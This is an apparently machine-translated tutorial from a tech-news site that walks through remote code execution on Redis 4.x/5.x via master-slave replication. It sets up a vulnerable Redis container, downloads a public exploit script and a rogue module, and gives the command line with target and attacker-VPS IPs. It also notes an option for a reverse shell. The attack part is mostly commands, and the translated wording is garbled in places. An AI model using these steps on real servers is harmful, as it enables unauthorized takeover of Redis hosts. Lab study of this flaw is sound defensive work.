Add to Favorites | Login | Register
Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

About us Contact us

How to realize the RCE 4.x/5.x of Redis based on master-slave replication

2025-01-20 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Internet Technology >

Share

Shulou(Shulou.com)06/01 Report--

This article mainly explains "Redis based on master-slave replication of RCE 4.x/5.x how to achieve", the article explains the content is simple and clear, easy to learn and understand, the following please follow the editor's ideas slowly in-depth, together to study and learn "Redis based on master-slave replication of RCE 4.x/5.x how to achieve" it!

First pull a 5.0 image

Docker search redis5.0 / / find the image docker pull damonevking/redis5.0 / / pull the third image in the following figure

0x02 operating environment

Run the container

Docker run-p 6379 6379-d damonevking/redis5.0 redis-server / / maps the port and runs the container

Access your ip+6379 port, as shown in the following figure.

0x03 exploit git clone https://github.com/Ridter/redis-rce.git / / download vulnerability exploit script

Note that a .so file is missing here, download it to https://github.com/n0b0dyCN/redis-rogue-server and put it in the same directory as redis-rce.py, and then execute the following command:

Python3 redis-rce.py-r 136.244.70.243 (target ip)-L 136.244.70.243 (own vps)-f exp.so / / ip don't code, masters, don't mess with me.

It should be noted that the-r here is followed by the target's ip, and-L is followed by the ip of the vps where you execute the script.

Here: I for interactive shell,r, for bounce shell, just choose according to your own needs

Thank you for your reading, the above is the content of "how to achieve Redis based on master-slave replication of RCE 4.x/5.x". After the study of this article, I believe you have a deeper understanding of how to achieve Redis based on master-slave replication of RCE 4.x/5.x, and the specific use needs to be verified in practice. Here is, the editor will push for you more related knowledge points of the article, welcome to follow!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Tag Search: Master-slave mirror learning running content container vulnerability target port script success three below interactive command that is master idea situation file vpn macOS Linux MariaDB MySQL Docker Shulou Information Shulou Technology Shulou Tech Info OPPO Reno Redmi Xiaomi NVidia Microsoft Huawei Apple Linux macOS Xiaomi vpn Apple Redmi OPPO Reno Huawei Shulou Tech Info MariaDB Shulou Information MySQL NVidia Docker Shulou Technology Microsoft Linux macOS Xiaomi vpn Apple Redmi OPPO Reno Huawei Shulou Tech Info MariaDB Shulou Information MySQL NVidia Docker Shulou Technology Microsoft

Share To

Related

Internet Technology

More Internet Technology >

Latest Network Security More Network Security >

Latest Internet Technology More Internet Technology >

Latest Development More Development >

Latest Database More Database >

Latest Servers More Servers >

Latest Mobile Phone More Mobile Phone >

Latest Android Software More Android Software >

Latest Apple Software More Apple Software >

Latest Computer Software News More Computer Software News >

Latest IT Information More IT Information >

Wechat

About us Contact us Product review car news thenatureplanet

© 2024 shulou.com SLNews company. All rights reserved.

12
Report